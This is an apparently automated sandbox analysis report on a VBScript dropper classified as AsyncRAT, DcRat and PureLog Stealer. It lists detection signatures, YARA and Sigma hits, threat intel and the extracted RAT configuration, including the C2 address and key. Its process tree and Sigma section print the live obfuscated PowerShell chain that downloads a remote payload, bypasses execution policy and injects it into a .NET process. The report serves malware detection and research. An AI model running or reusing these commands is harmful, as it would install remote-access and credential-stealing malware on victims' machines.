Edit tour

Windows Analysis Report
1iH5ABLKIA.vbs

Overview

General Information

Sample name:	1iH5ABLKIA.vbs renamed because original name is a hash value
Original sample name:	524b71c4013215761e79452ecd84fecf4ee101bd2011d2d95e604a566db996af.vbs
Analysis ID:	1523828
MD5:	a992cf1046f493363298d5afb9caa0fe
SHA1:	45655954dbcb8526284b0227728425d240dc2269
SHA256:	524b71c4013215761e79452ecd84fecf4ee101bd2011d2d95e604a566db996af
Tags:	BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

AsyncRAT, DcRat, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected AsyncRAT

Yara detected DcRat

Yara detected PureLog Stealer

.NET source code references suspicious native API functions

AI detected suspicious sample

Bypasses PowerShell execution policy

Connects to a pastebin service (likely for C&C)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Obfuscated command line found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to detect virtual machines (SLDT)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5492 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1iH5ABLKIA.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 4000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )" MD5: 04029E121A0CFA5991749937DD22A1D9)

AddInProcess32.exe (PID: 5792 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: AsyncRAT

{"Server": "148.113.165.11", "Ports": "3236", "Version": "1.0.7", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "V4JA2wRo4wMqThNx0lUpEh05ezE9saTH", "Mutex": "Dggx_gg", "Certificate": "MIICJjCCAY+gAwIBAgIVAKTSE5n95JKjYKaeetJmkZ8WSed/MA0GCSqGSIb3DQEBDQUAMFoxCzAJBgNVBAMMAmdnMRMwEQYDVQQLDApxd3FkYW5jaHVuMRwwGgYDVQQKDBNEY1JhdCBCeSBxd3FkYW5jaHVuMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjMxMjAzMTAyNjE5WhcNMzQwOTExMTAyNjE5WjAQMQ4wDAYDVQQDDAVEY1JhdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAphKhL5VEa5bZce3HMNoHj07+Nyd8QMtT+YV1vVQeIuxBYfOBrszAxxSRJayhzQwZjw8Du9bw87agBJW06h+GHW8MOufcZ+vKSxmpOL0ze3nUSJiOsfboKa06jcmEpo32D7LTxng9/mAGKb0YGEFUGx88yMDaa+NiBIn/LnWXvaECAwEAAaMyMDAwHQYDVR0OBBYEFMn0HT3AJLPhSr+HTYNM/0589fJ0MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEASB+of3f3t+mAacV7FNg5vwlQhgObMv2su+9BL5KxsQVNsBhluNcrZINzF5jKq/8VafO48B00S1O2MnNHmBXQlZ09Iw8Krvm1hZDmBErHPe0Bwwa5ox6ZpJLnodcOGX2JXMfEY2n/6QC0zva9sGQiyazHOYJRTk5RgJhN7j10nZY=", "ServerSignature": "XjeYWme80rSVhHa/BEFI1k3bRgPGhkJfVbkFLvepbqtufl6cOLxu+woVZZM7psVFdchemmHXVOOta4B/iTyJBzInHTih/neulrIRbgq5zdS22cEhHESwIui1ZS3o5BnYGcZRdZTdXfGH6otoicbOBzdpc41nx3BIOXuL5tRHqjI=", "BDOS": "null", "External_config_on_Pastebin": "false"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x2dc1da:$b2: DcRat By qwqdanchun1

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000005.00000002.3465673690.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x63fb:$a1: havecamera 0x9874:$a2: timeout 3 > NUL 0x9894:$a3: START "" " 0x971f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x97d4:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
00000005.00000002.3466547195.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x32eba:$b2: DcRat By qwqdanchun1
00000005.00000002.3466547195.0000000000B70000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x12ce:$b2: DcRat By qwqdanchun1
00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000004.00000002.2257689988.000002198F4E4000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x1ca5b:$a1: havecamera 0x2b113:$a1: havecamera 0x1fed4:$a2: timeout 3 > NUL 0x2e58c:$a2: timeout 3 > NUL 0x1fef4:$a3: START "" " 0x2e5ac:$a3: START "" " 0x1fd7f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x2e437:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x1fe34:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x2e4ec:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
00000005.00000002.3468761215.0000000002811000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DcRat_2	Yara detected DcRat	Joe Security
00000005.00000002.3468761215.0000000002811000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x3a10:$b1: DcRatByqwqdanchun 0x2ae2a:$b2: DcRat By qwqdanchun1
00000004.00000002.2297059905.00000219A7700000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.2274321947.000002199F4DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: powershell.exe PID: 4000	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2f926:$b3: ::UTF8.GetString( 0x2fea8:$b3: ::UTF8.GetString( 0x3108c:$b3: ::UTF8.GetString( 0x31794:$b3: ::UTF8.GetString( 0x31d72:$b3: ::UTF8.GetString( 0x322fb:$b3: ::UTF8.GetString( 0x331bf:$b3: ::UTF8.GetString( 0x3c0a9:$b3: ::UTF8.GetString( 0x3c632:$b3: ::UTF8.GetString( 0x3d18c:$b3: ::UTF8.GetString( 0x3d8b9:$b3: ::UTF8.GetString( 0x6d37c:$b3: ::UTF8.GetString( 0x766b4:$b3: ::UTF8.GetString( 0x824ce:$b3: ::UTF8.GetString( 0x8257b:$b3: ::UTF8.GetString( 0x82ad3:$b3: ::UTF8.GetString( 0xa9ac7:$b3: ::UTF8.GetString( 0xaa050:$b3: ::UTF8.GetString( 0xaaa07:$b3: ::UTF8.GetString( 0xaaf89:$b3: ::UTF8.GetString( 0xb0781:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 2144	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: powershell.exe PID: 2144	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0xd13a9:$a1: havecamera 0xd5f51:$b1: DcRatByqwqdanchun
Process Memory Space: powershell.exe PID: 2144	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x6291f:$b2: ::FromBase64String( 0x63eef:$b2: ::FromBase64String( 0x7846e:$s1: -join 0x979c7:$s1: -join 0x142645:$s1: -join 0x142f29:$s1: -join 0x178ed5:$s1: -join 0x179636:$s1: -join 0x1feb98:$s1: -join 0x20be19:$s1: -join 0x20f2db:$s1: -join 0x20f975:$s1: -join 0x211471:$s1: -join 0x2136d3:$s1: -join 0x213efa:$s1: -join 0x21476b:$s1: -join 0x214ea6:$s1: -join 0x214ed8:$s1: -join 0x214f20:$s1: -join 0x214f3f:$s1: -join 0x215790:$s1: -join
Process Memory Space: AddInProcess32.exe PID: 5792	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: AddInProcess32.exe PID: 5792	JoeSecurity_DcRat_2	Yara detected DcRat	Joe Security
Process Memory Space: AddInProcess32.exe PID: 5792	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x9e97:$a1: havecamera 0xea3f:$b1: DcRatByqwqdanchun 0x200f5:$b1: DcRatByqwqdanchun 0x3ddb:$b2: DcRat By qwqdanchun1 0x16130:$b2: DcRat By qwqdanchun1 0x2aa00:$b2: DcRat By qwqdanchun1
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
5.2.AddInProcess32.exe.400000.0.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x65fb:$a1: havecamera 0x9a74:$a2: timeout 3 > NUL 0x9a94:$a3: START "" " 0x991f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x99d4:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
5.2.AddInProcess32.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x99d4:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x991f:$s2: L2Mgc2NodGFza3MgL2 0x989e:$s3: QW1zaVNjYW5CdWZmZXI 0x98ec:$s4: VmlydHVhbFByb3RlY3Q
5.2.AddInProcess32.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9c56:$q1: Select * from Win32_CacheMemory 0x9c96:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9ce4:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9d32:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
5.2.AddInProcess32.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa0ce:$s1: DcRatBy
4.2.powershell.exe.2198f4fa460.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.powershell.exe.2198f4fa460.0.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x47fb:$a1: havecamera 0x7c74:$a2: timeout 3 > NUL 0x7c94:$a3: START "" " 0x7b1f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x7bd4:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
4.2.powershell.exe.2198f4fa460.0.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x7bd4:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x7b1f:$s2: L2Mgc2NodGFza3MgL2 0x7a9e:$s3: QW1zaVNjYW5CdWZmZXI 0x7aec:$s4: VmlydHVhbFByb3RlY3Q
4.2.powershell.exe.2198f4fa460.0.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x7e56:$q1: Select * from Win32_CacheMemory 0x7e96:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x7ee4:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x7f32:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
4.2.powershell.exe.2198f4fa460.0.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0x82ce:$s1: DcRatBy
4.2.powershell.exe.2198f4fa460.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.powershell.exe.2198f4fa460.0.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x65fb:$a1: havecamera 0x14cb3:$a1: havecamera 0x9a74:$a2: timeout 3 > NUL 0x1812c:$a2: timeout 3 > NUL 0x9a94:$a3: START "" " 0x1814c:$a3: START "" " 0x991f:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x17fd7:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x99d4:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x1808c:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
4.2.powershell.exe.2198f4fa460.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x99d4:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x1808c:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x991f:$s2: L2Mgc2NodGFza3MgL2 0x17fd7:$s2: L2Mgc2NodGFza3MgL2 0x989e:$s3: QW1zaVNjYW5CdWZmZXI 0x17f56:$s3: QW1zaVNjYW5CdWZmZXI 0x98ec:$s4: VmlydHVhbFByb3RlY3Q 0x17fa4:$s4: VmlydHVhbFByb3RlY3Q
4.2.powershell.exe.2198f4fa460.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x9c56:$q1: Select * from Win32_CacheMemory 0x1830e:$q1: Select * from Win32_CacheMemory 0x9c96:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x1834e:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x9ce4:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x1839c:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x9d32:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x183ea:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
4.2.powershell.exe.2198f4fa460.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DcRatBy	Detects executables containing the string DcRatBy	ditekSHen	0xa0ce:$s1: DcRatBy 0x18786:$s1: DcRatBy
4.2.powershell.exe.219a7700000.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.powershell.exe.2199fcf01f0.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.powershell.exe.219a7700000.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
4.2.powershell.exe.2199fcf01f0.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 14 entries

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4KCAoJzknKydqRHVybCA9IHYnKydlNWh0JysndCcrJ3AnKydzOi8vaWE2MCcrJzAxMDAudXMuYScrJ3JjaCcrJ2l2ZS5vJysncmcvMicrJzQvaXRlbXMvZGV0YScrJ2gtJysnbm90ZS12L0QnKydldGFoJysnTm90ZVYudHh0JysndmU1OycrJzlqRGJhc2U2NENvJysnbnQnKydlbnQnKycgPSAoTicrJ2V3LU9iaicrJ2VjJysndCBTeXMnKyd0ZW0nKycuJysnTmV0LldlYkNsaWVudCkuRG93bmwnKydvYWRTJysndHInKydpbmcoOWpEdXInKydsJysnKTs5akRiJysnaW5hJysncnknKydDJysnb250ZW50ID0gJysnW1N5cycrJ3RlbS4nKydDb252ZXJ0XTo6RnJvbScrJ0JhJysnc2U2NFN0cicrJ2knKyduZygnKyc5JysnakRiYXNlNjRDb24nKyd0ZW4nKyd0KTs5akRhc3NlbWJseSA9IFtSJysnZWZsZWN0JysnaW9uLkFzc2VtYmwnKyd5XTo6TG9hZCg5akQnKydiaW4nKydhcnlDb24nKyd0ZW4nKyd0KTs5akQnKyd0eXBlID0gOScrJ2pEYXNzZW1iJysnbHkuR2V0JysnVHknKydwZSh2ZTVSdW5QRS5Ib21ldicrJ2U1KTs5JysnakQnKydtZXRob2QgPSA5aicrJ0R0JysneXAnKydlLkdldE1ldGhvZCh2ZTVWQUl2ZTUpOzlqRG1ldCcrJ2hvZC4nKydJbnYnKydvJysna2UoOWpEbnVsbCcrJywgW29iamVjdCcrJ1snKyddXUAodmU1MC9NTicrJ1RhJysnQS9kL2VlLmV0c2FwLy86c3B0JysndGgnKyd2ZTUgLCB2ZTVkZXMnKydhdGl2YWRvdmU1ICwgdmU1ZGVzYXRpJysndmFkb3ZlNSAnKycsICcrJ3ZlNWRlc2F0aXYnKydhZG92JysnZTUsdmUnKyc1QWRkSW4nKydQcicrJ29jZScrJ3NzMzJ2ZTUsdmU1dmU1JysnKScrJyknKS5SZVBsYUNlKCc5akQnLFtzdHJJTkddW0NoQVJdMzYpLlJlUGxhQ2UoJ3ZlNScsW3N0cklOR11bQ2hBUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProc

Sigma detected: Potential PowerShell Command Line Obfuscation

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 